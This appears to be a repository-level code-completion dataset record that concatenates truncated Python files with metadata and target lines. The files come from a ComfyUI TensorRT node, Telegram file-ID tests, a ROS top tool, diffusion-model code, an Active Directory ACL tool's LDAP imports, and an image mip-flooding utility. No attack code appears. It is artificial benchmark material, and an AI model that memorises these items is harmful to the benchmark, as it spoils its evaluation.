from .model_manager import TRT_MODEL_DIR, modelmanager
from .utilities import Engine
from comfy.model_base import ModelType, model_sampling # ModelType used in eval() - do not remove
from comfy import model_management | 3,120 | # -*- coding: utf-8 -*-
# modified from https://github.com/NVIDIA/Stable-Diffusion-WebUI-TensorRT/blob/main/scripts/trt.py
# CHANGE: wrap TrtUnet to make comfy node
# STATUS: working but need clean vram to change model
# rabbit hole 0: original unet implementation
# - https://github.com/CompVis/stable-diffusion/blob/main/ldm/modules/diffusionmodules/openaimodel.py >>> UNetModel
# rabbit hole 1: a1111 unet loader
# - https://github.com/AUTOMATIC1111/stable-diffusion-webui/blob/dev/modules/sd_unet.py
# rabbit hole 2: comfy unet loader
# - https://github.com/comfyanonymous/ComfyUI/blob/master/nodes.py >>> UNETLoader
# - https://github.com/comfyanonymous/ComfyUI/blob/master/comfy/sd.py >>> load_unet
# - https://github.com/comfyanonymous/ComfyUI/blob/master/comfy/model_patcher.py
# - https://github.com/comfyanonymous/ComfyUI/blob/master/comfy/model_base.py
LIST_ENGINES = modelmanager.available_models()
class TRT_Unet_Loader:
"""ComfyUI node"""
RETURN_TYPES = ("MODEL",)
CATEGORY = "advanced/loaders"
FUNCTION = "load_trt"
@classmethod
def INPUT_TYPES(cls):
return {"required": {
"engine_file": (list(LIST_ENGINES.keys()),),
################################################# test: convert directly in GUI
# "model" : ("MODEL",),
# "batch_min": ("INT", {"default": 1, "min": 1, "max": 16}),
# "batch_opt": ("INT", {"default": 1, "min": 1, "max": 16}),
# "batch_max": ("INT", {"default": 1, "min": 1, "max": 16}),
# "height_min": ("INT", {"default": 512, "min": 256, "max": 4096, "step": 64}),
# "height_opt": ("INT", {"default": 512, "min": 256, "max": 4096, "step": 64}),
# "height_max": ("INT", {"default": 768, "min": 256, "max": 4096, "step": 64}),
# "width_min": ("INT", {"default": 512, "min": 256, "max": 4096, "step": 64}),
# "width_opt": ("INT", {"default": 512, "min": 256, "max": 4096, "step": 64}),
# "width_max": ("INT", {"default": 768, "min": 256, "max": 4096, "step": 64}),
# "token_count_min": ("INT", {"default": 75, "min": 75, "max": 750}),
# "token_count_opt": ("INT", {"default": 75, "min": 75, "max": 750}),
# "token_count_max": ("INT", {"default": 75, "min": 75, "max": 750}),
# "force_export": ("BOOLEAN", {"default": False}),
# "static_shapes": ("BOOLEAN", {"default": False}),
# "use_float32": ("BOOLEAN", {"default": False}),
}}
def load_trt(self, engine_file: str) -> tuple:
configs: list = LIST_ENGINES[engine_file]
if configs[0]["config"].lora:
model_name = configs[0]["base_model"]
| # -*- coding: utf-8 -*-
# modified from https://github.com/NVIDIA/Stable-Diffusion-WebUI-TensorRT/blob/main/scripts/trt.py
# CHANGE: wrap TrtUnet to make comfy node
# STATUS: working but need clean vram to change model
# rabbit hole 0: original unet implementation
# - https://github.com/CompVis/stable-diffusion/blob/main/ldm/modules/diffusionmodules/openaimodel.py >>> UNetModel
# rabbit hole 1: a1111 unet loader
# - https://github.com/AUTOMATIC1111/stable-diffusion-webui/blob/dev/modules/sd_unet.py
# rabbit hole 2: comfy unet loader
# - https://github.com/comfyanonymous/ComfyUI/blob/master/nodes.py >>> UNETLoader
# - https://github.com/comfyanonymous/ComfyUI/blob/master/comfy/sd.py >>> load_unet
# - https://github.com/comfyanonymous/ComfyUI/blob/master/comfy/model_patcher.py
# - https://github.com/comfyanonymous/ComfyUI/blob/master/comfy/model_base.py
LIST_ENGINES = modelmanager.available_models()
class TRT_Unet_Loader:
"""ComfyUI node"""
RETURN_TYPES = ("MODEL",)
CATEGORY = "advanced/loaders"
FUNCTION = "load_trt"
@classmethod
def INPUT_TYPES(cls):
return {"required": {
"engine_file": (list(LIST_ENGINES.keys()),),
################################################# test: convert directly in GUI
# "model" : ("MODEL",),
# "batch_min": ("INT", {"default": 1, "min": 1, "max": 16}),
# "batch_opt": ("INT", {"default": 1, "min": 1, "max": 16}),
# "batch_max": ("INT", {"default": 1, "min": 1, "max": 16}),
# "height_min": ("INT", {"default": 512, "min": 256, "max": 4096, "step": 64}),
# "height_opt": ("INT", {"default": 512, "min": 256, "max": 4096, "step": 64}),
# "height_max": ("INT", {"default": 768, "min": 256, "max": 4096, "step": 64}),
# "width_min": ("INT", {"default": 512, "min": 256, "max": 4096, "step": 64}),
# "width_opt": ("INT", {"default": 512, "min": 256, "max": 4096, "step": 64}),
# "width_max": ("INT", {"default": 768, "min": 256, "max": 4096, "step": 64}),
# "token_count_min": ("INT", {"default": 75, "min": 75, "max": 750}),
# "token_count_opt": ("INT", {"default": 75, "min": 75, "max": 750}),
# "token_count_max": ("INT", {"default": 75, "min": 75, "max": 750}),
# "force_export": ("BOOLEAN", {"default": False}),
# "static_shapes": ("BOOLEAN", {"default": False}),
# "use_float32": ("BOOLEAN", {"default": False}),
}}
def load_trt(self, engine_file: str) -> tuple:
configs: list = LIST_ENGINES[engine_file]
if configs[0]["config"].lora:
model_name = configs[0]["base_model"] | lora_path = os.path.join(TRT_MODEL_DIR, configs[0]["filepath"]) | 0 | 2023-10-25 23:58:12+00:00 | 4k |
hydrogram/hydrogram | tests/test_file_id.py | [
{
"identifier": "FileId",
"path": "hydrogram/file_id.py",
"snippet": "class FileId:\n MAJOR = 4\n MINOR = 30\n\n def __init__(\n self,\n *,\n major: int = MAJOR,\n minor: int = MINOR,\n file_type: FileType,\n dc_id: int,\n file_reference: bytes =... | import pytest
from hydrogram.file_id import FileId, FileType, FileUniqueId, FileUniqueType | 3,278 | # Hydrogram - Telegram MTProto API Client Library for Python
# Copyright (C) 2017-2023 Dan <https://github.com/delivrance>
# Copyright (C) 2023-present Hydrogram <https://hydrogram.org>
#
# This file is part of Hydrogram.
#
# Hydrogram is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Hydrogram is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Hydrogram. If not, see <http://www.gnu.org/licenses/>.
def check(file_id: str, expected_file_type: FileType):
decoded = FileId.decode(file_id)
assert decoded.file_type == expected_file_type
assert decoded.encode() == file_id
| # Hydrogram - Telegram MTProto API Client Library for Python
# Copyright (C) 2017-2023 Dan <https://github.com/delivrance>
# Copyright (C) 2023-present Hydrogram <https://hydrogram.org>
#
# This file is part of Hydrogram.
#
# Hydrogram is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Hydrogram is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Hydrogram. If not, see <http://www.gnu.org/licenses/>.
def check(file_id: str, expected_file_type: FileType):
decoded = FileId.decode(file_id)
assert decoded.file_type == expected_file_type
assert decoded.encode() == file_id
| def check_unique(file_unique_id: str, expected_file_unique_type: FileUniqueType): | 3 | 2023-10-29 16:16:37+00:00 | 4k |
iwatake2222/rotop | src/rotop/rotop.py | [
{
"identifier": "DataContainer",
"path": "src/rotop/data_container.py",
"snippet": "class DataContainer:\n MAX_ROW_CSV = 600\n MAX_NUM_HISTORY = 100\n\n def __init__(self, write_csv=False):\n now = datetime.datetime.now()\n if write_csv:\n self.csv_dir_name = now.strftime('./rotop_%Y%m%d_%... | import argparse
import curses
import time
from .data_container import DataContainer
from .top_runner import TopRunner
from .gui_main import gui_main
from .utility import create_logger
from ._version import version
from .version_dummy import version | 3,440 | # Copyright 2023 iwatake2222
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import annotations
try:
except:
| # Copyright 2023 iwatake2222
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import annotations
try:
except:
| logger = create_logger(__name__, log_filename='rotop.log') | 3 | 2023-10-30 22:21:05+00:00 | 4k |
chenruduan/OAReactDiff | oa_reactdiff/dynamics/egnn_dynamics.py | [
{
"identifier": "EGNN",
"path": "oa_reactdiff/model/egnn.py",
"snippet": "class EGNN(nn.Module):\n def __init__(\n self,\n in_node_nf: int = 8,\n in_edge_nf: int = 2,\n hidden_nf: int = 256,\n edge_hidden_nf: int = 32,\n act_fn: str = \"swish\",\n n_la... | from typing import Dict, List, Optional, Tuple
from torch import nn, Tensor
from torch_scatter import scatter_mean
from oa_reactdiff.model import EGNN
from oa_reactdiff.utils._graph_tools import get_subgraph_mask
from ._base import BaseDynamics
import numpy as np
import torch | 3,293 |
class EGNNDynamics(BaseDynamics):
def __init__(
self,
model_config: Dict,
fragment_names: List[str],
node_nfs: List[int],
edge_nf: int,
condition_nf: int = 0,
pos_dim: int = 3,
update_pocket_coords: bool = True,
condition_time: bool = True,
edge_cutoff: Optional[float] = None,
|
class EGNNDynamics(BaseDynamics):
def __init__(
self,
model_config: Dict,
fragment_names: List[str],
node_nfs: List[int],
edge_nf: int,
condition_nf: int = 0,
pos_dim: int = 3,
update_pocket_coords: bool = True,
condition_time: bool = True,
edge_cutoff: Optional[float] = None, | model: nn.Module = EGNN, | 0 | 2023-10-30 02:53:38+00:00 | 4k |
lewandofskee/DiAD | ldm/modules/diffusionmodules/openaimodel.py | [
{
"identifier": "checkpoint",
"path": "ldm/modules/diffusionmodules/util.py",
"snippet": "def checkpoint(func, inputs, params, flag):\n \"\"\"\n Evaluate a function without caching intermediate activations, allowing for\n reduced memory at the expense of extra compute in the backward pass.\n ... | from abc import abstractmethod
from ldm.modules.diffusionmodules.util import (
checkpoint,
conv_nd,
linear,
avg_pool_nd,
zero_module,
normalization,
timestep_embedding,
)
from ldm.modules.attention import SpatialTransformer
from ldm.util import exists
from omegaconf.listconfig import ListConfig
import math
import numpy as np
import torch as th
import torch.nn as nn
import torch.nn.functional as F | 3,310 | x, (x.shape[2], x.shape[3] * 2, x.shape[4] * 2), mode="nearest"
)
else:
x = F.interpolate(x, scale_factor=2, mode="nearest")
# if self.scale_guide:
# x = F.interpolate(x, scale_factor=1.75, mode="nearest")
# else:
# x = F.interpolate(x, scale_factor=2, mode="nearest")
if self.use_conv:
x = self.conv(x)
return x
class TransposedUpsample(nn.Module):
'Learned 2x upsampling without padding'
def __init__(self, channels, out_channels=None, ks=5):
super().__init__()
self.channels = channels
self.out_channels = out_channels or channels
self.up = nn.ConvTranspose2d(self.channels,self.out_channels,kernel_size=ks,stride=2)
def forward(self,x):
return self.up(x)
class Downsample(nn.Module):
"""
A downsampling layer with an optional convolution.
:param channels: channels in the inputs and outputs.
:param use_conv: a bool determining if a convolution is applied.
:param dims: determines if the signal is 1D, 2D, or 3D. If 3D, then
downsampling occurs in the inner-two dimensions.
"""
def __init__(self, channels, use_conv, dims=2, out_channels=None,padding=1):
super().__init__()
self.channels = channels
self.out_channels = out_channels or channels
self.use_conv = use_conv
self.dims = dims
stride = 2 if dims != 3 else (1, 2, 2)
if use_conv:
self.op = conv_nd(
dims, self.channels, self.out_channels, 3, stride=stride, padding=padding
)
else:
assert self.channels == self.out_channels
self.op = avg_pool_nd(dims, kernel_size=stride, stride=stride)
def forward(self, x):
assert x.shape[1] == self.channels
return self.op(x)
class ResBlock(TimestepBlock):
"""
A residual block that can optionally change the number of channels.
:param channels: the number of input channels.
:param emb_channels: the number of timestep embedding channels.
:param dropout: the rate of dropout.
:param out_channels: if specified, the number of out channels.
:param use_conv: if True and out_channels is specified, use a spatial
convolution instead of a smaller 1x1 convolution to change the
channels in the skip connection.
:param dims: determines if the signal is 1D, 2D, or 3D.
:param use_checkpoint: if True, use gradient checkpointing on this module.
:param up: if True, use this block for upsampling.
:param down: if True, use this block for downsampling.
"""
def __init__(
self,
channels,
emb_channels,
dropout,
out_channels=None,
use_conv=False,
use_scale_shift_norm=False,
dims=2,
use_checkpoint=False,
up=False,
down=False,
):
super().__init__()
self.channels = channels
self.emb_channels = emb_channels
self.dropout = dropout
self.out_channels = out_channels or channels
self.use_conv = use_conv
self.use_checkpoint = use_checkpoint
self.use_scale_shift_norm = use_scale_shift_norm
self.in_layers = nn.Sequential(
normalization(channels),
nn.SiLU(),
conv_nd(dims, channels, self.out_channels, 3, padding=1),
)
self.updown = up or down
if up:
self.h_upd = Upsample(channels, False, dims)
self.x_upd = Upsample(channels, False, dims)
elif down:
self.h_upd = Downsample(channels, False, dims)
self.x_upd = Downsample(channels, False, dims)
else:
self.h_upd = self.x_upd = nn.Identity()
self.emb_layers = nn.Sequential(
nn.SiLU(),
linear(
emb_channels,
2 * self.out_channels if use_scale_shift_norm else self.out_channels,
),
)
self.out_layers = nn.Sequential(
normalization(self.out_channels),
nn.SiLU(),
nn.Dropout(p=dropout),
|
# dummy replace
def convert_module_to_f16(x):
pass
def convert_module_to_f32(x):
pass
## go
class AttentionPool2d(nn.Module):
"""
Adapted from CLIP: https://github.com/openai/CLIP/blob/main/clip/model.py
"""
def __init__(
self,
spacial_dim: int,
embed_dim: int,
num_heads_channels: int,
output_dim: int = None,
):
super().__init__()
self.positional_embedding = nn.Parameter(th.randn(embed_dim, spacial_dim ** 2 + 1) / embed_dim ** 0.5)
self.qkv_proj = conv_nd(1, embed_dim, 3 * embed_dim, 1)
self.c_proj = conv_nd(1, embed_dim, output_dim or embed_dim, 1)
self.num_heads = embed_dim // num_heads_channels
self.attention = QKVAttention(self.num_heads)
def forward(self, x):
b, c, *_spatial = x.shape
x = x.reshape(b, c, -1) # NC(HW)
x = th.cat([x.mean(dim=-1, keepdim=True), x], dim=-1) # NC(HW+1)
x = x + self.positional_embedding[None, :, :].to(x.dtype) # NC(HW+1)
x = self.qkv_proj(x)
x = self.attention(x)
x = self.c_proj(x)
return x[:, :, 0]
class TimestepBlock(nn.Module):
"""
Any module where forward() takes timestep embeddings as a second argument.
"""
@abstractmethod
def forward(self, x, emb):
"""
Apply the module to `x` given `emb` timestep embeddings.
"""
class TimestepEmbedSequential(nn.Sequential, TimestepBlock):
"""
A sequential module that passes timestep embeddings to the children that
support it as an extra input.
"""
def forward(self, x, emb, context=None):
for layer in self:
if isinstance(layer, TimestepBlock):
x = layer(x, emb)
elif isinstance(layer, SpatialTransformer):
x = layer(x, context)
else:
x = layer(x)
return x
class Upsample(nn.Module):
"""
An upsampling layer with an optional convolution.
:param channels: channels in the inputs and outputs.
:param use_conv: a bool determining if a convolution is applied.
:param dims: determines if the signal is 1D, 2D, or 3D. If 3D, then
upsampling occurs in the inner-two dimensions.
"""
def __init__(self, channels, use_conv, dims=2, out_channels=None, padding=1, scale_guide=False):
super().__init__()
self.channels = channels
self.out_channels = out_channels or channels
self.use_conv = use_conv
self.dims = dims
self.scale_guide = scale_guide
if use_conv:
self.conv = conv_nd(dims, self.channels, self.out_channels, 3, padding=padding)
def forward(self, x):
assert x.shape[1] == self.channels
if self.dims == 3:
x = F.interpolate(
x, (x.shape[2], x.shape[3] * 2, x.shape[4] * 2), mode="nearest"
)
else:
x = F.interpolate(x, scale_factor=2, mode="nearest")
# if self.scale_guide:
# x = F.interpolate(x, scale_factor=1.75, mode="nearest")
# else:
# x = F.interpolate(x, scale_factor=2, mode="nearest")
if self.use_conv:
x = self.conv(x)
return x
class TransposedUpsample(nn.Module):
'Learned 2x upsampling without padding'
def __init__(self, channels, out_channels=None, ks=5):
super().__init__()
self.channels = channels
self.out_channels = out_channels or channels
self.up = nn.ConvTranspose2d(self.channels,self.out_channels,kernel_size=ks,stride=2)
def forward(self,x):
return self.up(x)
class Downsample(nn.Module):
"""
A downsampling layer with an optional convolution.
:param channels: channels in the inputs and outputs.
:param use_conv: a bool determining if a convolution is applied.
:param dims: determines if the signal is 1D, 2D, or 3D. If 3D, then
downsampling occurs in the inner-two dimensions.
"""
def __init__(self, channels, use_conv, dims=2, out_channels=None,padding=1):
super().__init__()
self.channels = channels
self.out_channels = out_channels or channels
self.use_conv = use_conv
self.dims = dims
stride = 2 if dims != 3 else (1, 2, 2)
if use_conv:
self.op = conv_nd(
dims, self.channels, self.out_channels, 3, stride=stride, padding=padding
)
else:
assert self.channels == self.out_channels
self.op = avg_pool_nd(dims, kernel_size=stride, stride=stride)
def forward(self, x):
assert x.shape[1] == self.channels
return self.op(x)
class ResBlock(TimestepBlock):
"""
A residual block that can optionally change the number of channels.
:param channels: the number of input channels.
:param emb_channels: the number of timestep embedding channels.
:param dropout: the rate of dropout.
:param out_channels: if specified, the number of out channels.
:param use_conv: if True and out_channels is specified, use a spatial
convolution instead of a smaller 1x1 convolution to change the
channels in the skip connection.
:param dims: determines if the signal is 1D, 2D, or 3D.
:param use_checkpoint: if True, use gradient checkpointing on this module.
:param up: if True, use this block for upsampling.
:param down: if True, use this block for downsampling.
"""
def __init__(
self,
channels,
emb_channels,
dropout,
out_channels=None,
use_conv=False,
use_scale_shift_norm=False,
dims=2,
use_checkpoint=False,
up=False,
down=False,
):
super().__init__()
self.channels = channels
self.emb_channels = emb_channels
self.dropout = dropout
self.out_channels = out_channels or channels
self.use_conv = use_conv
self.use_checkpoint = use_checkpoint
self.use_scale_shift_norm = use_scale_shift_norm
self.in_layers = nn.Sequential(
normalization(channels),
nn.SiLU(),
conv_nd(dims, channels, self.out_channels, 3, padding=1),
)
self.updown = up or down
if up:
self.h_upd = Upsample(channels, False, dims)
self.x_upd = Upsample(channels, False, dims)
elif down:
self.h_upd = Downsample(channels, False, dims)
self.x_upd = Downsample(channels, False, dims)
else:
self.h_upd = self.x_upd = nn.Identity()
self.emb_layers = nn.Sequential(
nn.SiLU(),
linear(
emb_channels,
2 * self.out_channels if use_scale_shift_norm else self.out_channels,
),
)
self.out_layers = nn.Sequential(
normalization(self.out_channels),
nn.SiLU(),
nn.Dropout(p=dropout), | zero_module( | 4 | 2023-10-30 14:21:09+00:00 | 4k |
nv-tlabs/trace | tbsim/datasets/factory.py | [
{
"identifier": "translate_pass_trajdata_cfg",
"path": "tbsim/utils/config_utils.py",
"snippet": "def translate_pass_trajdata_cfg(cfg: ExperimentConfig):\n \"\"\"\n Translate a unified passthrough config to trajdata.\n \"\"\"\n rcfg = Dict()\n rcfg.step_time = cfg.algo.step_time\n rcfg... | from tbsim.utils.config_utils import translate_pass_trajdata_cfg
from tbsim.datasets.trajdata_datamodules import PassUnifiedDataModule | 1,604 | """DataModule / Dataset factory"""
def datamodule_factory(cls_name: str, config):
"""
A factory for creating pl.DataModule.
Args:
cls_name (str): name of the datamodule class
config (Config): an Experiment config object
**kwargs: any other kwargs needed by the datamodule
Returns:
A DataModule
"""
if cls_name.startswith("PassUnified"):
| """DataModule / Dataset factory"""
def datamodule_factory(cls_name: str, config):
"""
A factory for creating pl.DataModule.
Args:
cls_name (str): name of the datamodule class
config (Config): an Experiment config object
**kwargs: any other kwargs needed by the datamodule
Returns:
A DataModule
"""
if cls_name.startswith("PassUnified"): | trajdata_config = translate_pass_trajdata_cfg(config) | 0 | 2023-10-31 18:43:07+00:00 | 4k |
AetherBlack/abuseACL | abuseACL/network/LDAP.py | [
{
"identifier": "sAMAccountType",
"path": "abuseACL/structures/sAMAccountType.py",
"snippet": "class sAMAccountType:\n\n SAM_DOMAIN_OBJECT = 0x0\n SAM_GROUP_OBJECT = 0x10000000\n SAM_NON_SECURITY_GROUP_OBJECT = 0x10000001\n SAM_ALIAS_OBJECT = 0x20000000\n SAM_NON_SECURITY_ALIAS_OBJECT = 0... | from typing import List
from abuseACL.structures.sAMAccountType import sAMAccountType
from abuseACL.structures.Credentials import Credentials
from abuseACL.structures.Target import Target
from abuseACL.structures.ADObject.ADCertificateTemplate import ADCertificateTemplate
from abuseACL.structures.ADObject.ADAdminSDHolder import ADAdminSDHolder
from abuseACL.structures.ADObject.ADComputer import ADComputer
from abuseACL.structures.ADObject.ADSchema import ADSchema
from abuseACL.structures.ADObject.ADGroup import ADGroup
from abuseACL.structures.ADObject.ADUser import ADUser
from abuseACL.structures.ADObject.ADgMSA import ADgMSA
from abuseACL.structures.ADObject.ADGPO import ADGPO
from abuseACL.structures.ADObject.ADOU import ADOU
from abuseACL.network.Kerberos import Kerberos
from abuseACL.core.Logger import Logger
import ssl as tls
import ldap3 | 3,501 |
class LDAP:
users = list()
groups = list()
computers = list()
certificatesTemplates = list()
gpos = list()
ous = list()
adminSDHolder = list()
schema = list()
gMSA = list()
|
class LDAP:
users = list()
groups = list()
computers = list()
certificatesTemplates = list()
gpos = list()
ous = list()
adminSDHolder = list()
schema = list()
gMSA = list()
| def __init__(self, forest: str, target: Target, credentials: Credentials, logger: Logger) -> None: | 13 | 2023-10-30 21:19:24+00:00 | 4k |
gydpku/PPTC | src/modeling.py | [
{
"identifier": "ppt_executor",
"path": "src/ppt_executor.py",
"snippet": "SLIDE_HEIGHT = 6858000\nSLIDE_WIDTH = 9144000\nCENTER_TOP = 3429000\nCENTER_LEFT = 4572000\nSHAPE_HEIGHT = 900000\nSHAPE_WIDTH = 900000\nTABLE_HEIGHT = 370000 # per line\nCONTENT_HEIGHT = 4351338\nCONTENT_WIDTH = 7886700\nCONTENT... | from src import ppt_executor, ppt_reader, openai_api, prompt_factor, dataset, api_selection, utils, api_doc | 1,944 |
class PPT_assistant(object):
def __init__(self, args=None):
self.chat_history = []
self.args = args
self.planning = args.planning
self.api_selection = args.api_selection
self.content_selection = args.content_selection
self.model = args.model
self.model_id=args.model_id
self.ppt = None
self.current_page_id = 0
self.prompt = ""
def planner(self, instruction):
if not self.planning:
return [instruction]
else:
print('Planning...')
planning_prompt = prompt_factor.query_decomposition_prompt.format(instruction)
self.prompt += planning_prompt + "\n\n"
planning_reply = openai_api.query_azure_openai(planning_prompt, model=self.model).strip()
decomposed = planning_reply.split('\n')
decomposed = [d.replace('</d>','') for d in decomposed if (d != '</d>') and (d != '<d>')]
print(f"{instruction}->{decomposed}")
return decomposed
def api_selector(self, instruction):
if not self.api_selection:
all_apis = api_selection.get_all_apis(self.args)
return all_apis
else:
selected_apis = api_selection.get_selected_apis(instruction, self.args)
print('Selecting APIs...')
print([x.name for x in selected_apis])
return selected_apis
def content_selector(self, ppt_path, instruction, args, ppt):
|
class PPT_assistant(object):
def __init__(self, args=None):
self.chat_history = []
self.args = args
self.planning = args.planning
self.api_selection = args.api_selection
self.content_selection = args.content_selection
self.model = args.model
self.model_id=args.model_id
self.ppt = None
self.current_page_id = 0
self.prompt = ""
def planner(self, instruction):
if not self.planning:
return [instruction]
else:
print('Planning...')
planning_prompt = prompt_factor.query_decomposition_prompt.format(instruction)
self.prompt += planning_prompt + "\n\n"
planning_reply = openai_api.query_azure_openai(planning_prompt, model=self.model).strip()
decomposed = planning_reply.split('\n')
decomposed = [d.replace('</d>','') for d in decomposed if (d != '</d>') and (d != '<d>')]
print(f"{instruction}->{decomposed}")
return decomposed
def api_selector(self, instruction):
if not self.api_selection:
all_apis = api_selection.get_all_apis(self.args)
return all_apis
else:
selected_apis = api_selection.get_selected_apis(instruction, self.args)
print('Selecting APIs...')
print([x.name for x in selected_apis])
return selected_apis
def content_selector(self, ppt_path, instruction, args, ppt): | content, prompt = ppt_reader.get_content_by_instructions(ppt_path, instruction, args, ppt) | 1 | 2023-10-25 13:14:46+00:00 | 4k |
secarri/MipFlooding | mipflooding/image_processing.py | [
{
"identifier": "setup_logger",
"path": "mipflooding/logger.py",
"snippet": "def setup_logger(logger_name: str, abs_log_path: str) -> logging.Logger:\n \"\"\"Set up a logger with the specified name and log to the given absolute path, returning the logger instance.\"\"\"\n logger = logging.getLogge... | import logging
import math
import os
import time
from pathlib import Path
from typing import List, Optional
from PIL import Image
from .logger import setup_logger, terminate_loggers
from .file_utils import clear_log_file, get_output_directory, get_output_filename | 1,829 |
# From self package
def _open_image_inputs(color: str, alpha: str, logger: logging.Logger) -> List:
"""Open and return the color and alpha images as a list of Image objects."""
logger.info("--- Opening images in memory...")
if not color:
color = str(None)
if not alpha:
alpha = str(None)
color_map = None if not Path(color).exists() else Image.open(color)
alpha_mask = None if not Path(alpha).exists() else Image.open(alpha).convert('L')
if color_map:
logger.info(f"--- File disk size: {os.path.getsize(color) / float(1 << 20):,.2f} MB")
return [color_map, alpha_mask]
def _validate_inputs(color: Image, alpha_mask: Image, logger: logging.Logger,
input_texture_color_abs_path: str) -> str | Optional[None]:
if color is None or alpha_mask is None:
message = f"One or more inputs do not exist:\n\t-Color: {color}\n\t-Alpha: {alpha_mask}. Skipping..."
elif not _do_resolutions_match(color, alpha_mask, logger):
message = f"Inputs do not match in resolution for file: {input_texture_color_abs_path}. Skipping..."
elif not _is_power_of_two_image(color, logger):
message = f"Input is not a power of two image: {input_texture_color_abs_path}. Skipping..."
else:
message = None
return message
def _do_resolutions_match(color: Image, alpha: Image, logger: logging.Logger) -> bool:
"""Check if the resolutions of color and alpha images match."""
logger.info("--- Verifying that inputs resolutions do match ...")
return True if color.size == alpha.size else False
def _is_power_of_two_image(color: Image, logger: logging.Logger) -> bool:
"""Check if all dimensions of the input image are powers of two."""
logger.info("--- Verifying that inputs are power of two images ...")
for res in color.size:
if (res & (res - 1)) != 0:
return False
return True
def _get_mip_levels(image: Image, logger: logging.Logger) -> int:
"""Calculate the number of mip levels based on image size."""
logger.info("--- Calculating mip map levels...")
image_short_side = image.size[0] if image.size[0] < image.size[1] else image.size[1]
logger.info(f"--- Done. Miplevels: {round(math.log2(image_short_side))}")
return round(math.log2(image_short_side))
def _generate_background(image: Image, logger: logging.Logger) -> Image:
"""Generate a background image and returns the result Image object."""
logger.info("--- Generating background image and storing it in memory...")
average_image_color = image.resize((1, 1))
up_scaled_avg = average_image_color.resize(image.size, Image.NEAREST)
return up_scaled_avg
def _calculate_image_height(image_width: int, image: Image) -> int:
"""Calculate the height of the image based on the specified width."""
width_percent = (image_width / float(image.size[0]))
new_height = int((float(image.size[1]) * float(width_percent)))
return new_height
def _stack_mip_levels(average_bgr: str, miplevels: int, color: Image, origin_width: int, origin_height: int,
output_dir: str, logger: logging.Logger, resample: Image.Resampling = Image.BOX) -> None:
"""Stack Mipmap levels on a background Image with alpha integration to generate a single Image."""
stack = average_bgr
logger.info(f"--- Storing original resolution in memory: {origin_width, origin_height}")
logger.info(f"--- Beginning the stacking process. Please wait...")
for miplevel in range(miplevels):
width = 2 ** (miplevel + 1)
height = _calculate_image_height(width, color)
new_image = color.resize((width, height), resample)
to_stack = new_image.copy().resize((origin_width, origin_height), Image.NEAREST)
img_copy = stack.copy()
img_copy.paste(to_stack, (0, 0), to_stack)
stack = img_copy.copy()
logger.info(f"--- Saving stack to file: {output_dir}")
stack.save(output_dir)
logger.info(f"--- Output disk size: {os.path.getsize(output_dir) / float(1 << 20):,.2f} MB")
def _log_and_terminate(logger, message, level=logging.ERROR):
"""Log the given 'message' at the specified 'level' using the 'logger', and then terminate the logger."""
logger.log(level=level, msg=message)
terminate_loggers(logger)
def _make_logger_for_file(directory: str, filename: str) -> logging.Logger:
"""Constructs the full path to a log file, clears the existing log file, and sets up a logger."""
logs_directory = os.path.join(directory, "logs")
Path(logs_directory).mkdir(parents=True, exist_ok=True)
out_log_file = Path(os.path.join(logs_directory, f"{filename.split('.')[0]}.txt"))
clear_log_file(out_log_file)
return setup_logger("mipmap_flooding", out_log_file.__str__())
def run_mip_flooding(in_texture_color_abs_path: str, in_texture_alpha_abs_path: str, out_abs_path: str) -> None:
"""
Perform Mipmap Flooding on input color and alpha textures to optimize for disk storage.
This function processes a pair of input textures (color and alpha). It generates Mipmap levels, starting from the
original resolution and gradually downsizing to a 1x1 Mipmap. The function then assembles these Mipmaps, layer by
layer, reintegrating the alpha channel, until it reaches the original resolution.
Args:
in_texture_color_abs_path (str): The absolute path to the color texture image.
in_texture_alpha_abs_path (str): The absolute path to the alpha texture image.
out_abs_path (str): The absolute path for the output image.
Example:
run_mip_flooding('input_color.png', 'input_alpha.png', 'output_texture.png')
"""
start_time = time.perf_counter()
| # Default packages
# Third party packages
# From self package
def _open_image_inputs(color: str, alpha: str, logger: logging.Logger) -> List:
"""Open and return the color and alpha images as a list of Image objects."""
logger.info("--- Opening images in memory...")
if not color:
color = str(None)
if not alpha:
alpha = str(None)
color_map = None if not Path(color).exists() else Image.open(color)
alpha_mask = None if not Path(alpha).exists() else Image.open(alpha).convert('L')
if color_map:
logger.info(f"--- File disk size: {os.path.getsize(color) / float(1 << 20):,.2f} MB")
return [color_map, alpha_mask]
def _validate_inputs(color: Image, alpha_mask: Image, logger: logging.Logger,
input_texture_color_abs_path: str) -> str | Optional[None]:
if color is None or alpha_mask is None:
message = f"One or more inputs do not exist:\n\t-Color: {color}\n\t-Alpha: {alpha_mask}. Skipping..."
elif not _do_resolutions_match(color, alpha_mask, logger):
message = f"Inputs do not match in resolution for file: {input_texture_color_abs_path}. Skipping..."
elif not _is_power_of_two_image(color, logger):
message = f"Input is not a power of two image: {input_texture_color_abs_path}. Skipping..."
else:
message = None
return message
def _do_resolutions_match(color: Image, alpha: Image, logger: logging.Logger) -> bool:
"""Check if the resolutions of color and alpha images match."""
